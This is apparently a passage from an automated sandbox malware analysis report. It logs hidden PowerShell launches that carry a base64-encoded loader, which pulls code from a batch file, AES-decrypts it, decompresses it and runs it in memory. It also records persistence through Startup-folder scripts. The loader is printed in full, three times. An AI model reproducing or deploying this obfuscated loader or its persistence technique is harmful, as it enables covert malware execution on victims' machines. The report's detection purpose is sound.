nlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd

Boot Survival

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f830a6f2.cmd

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f830a6f2.cmd			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cb5dd181.cmd			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_91fb5707.cmd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5d67225f.cmd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9ede7b6f.cmd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c8e68097.cmd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_bb8d17be.cmd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cb4fe679.cmd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_97423272.cmd

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
